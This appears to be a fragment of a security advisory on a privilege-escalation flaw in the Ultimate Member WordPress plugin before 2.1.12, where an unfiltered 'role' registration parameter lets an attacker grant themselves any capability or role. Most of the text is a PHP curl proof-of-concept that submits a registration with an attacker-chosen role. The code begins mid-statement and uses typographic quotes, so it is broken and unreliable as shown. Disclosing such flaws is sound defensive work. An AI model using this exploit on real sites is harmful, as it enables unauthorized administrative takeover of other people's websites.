Due to the lack of filtering on the role parameter that could be supplied during the registration process, an attacker could supply the role parameter with a WordPress capability or any custom Ultimate Member role and effectively be granted those privileges.
$username, ‘first_name-’. $form_id => $name, ‘last_name-’ . $form_id => $lastname, ‘user_email-’ . $form_id => $email, ‘user_password-’ . $form_id => ‘StrongPassword123!’, ‘confirm_user_password-’ . $form_id => ‘StrongPassword123!’, ‘role’ => $um_role, ‘form_id’ => $form_id, ‘timestamp’ => ‘1603399250’, ‘um_request’ => ‘’, ‘_wpnonce’ => $nonce, ‘_wp_http_referer’ => ‘register’ ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>
CPE | Name | Operator | Version |
---|---|---|---|
ultimate-member | lt | 2.1.12 |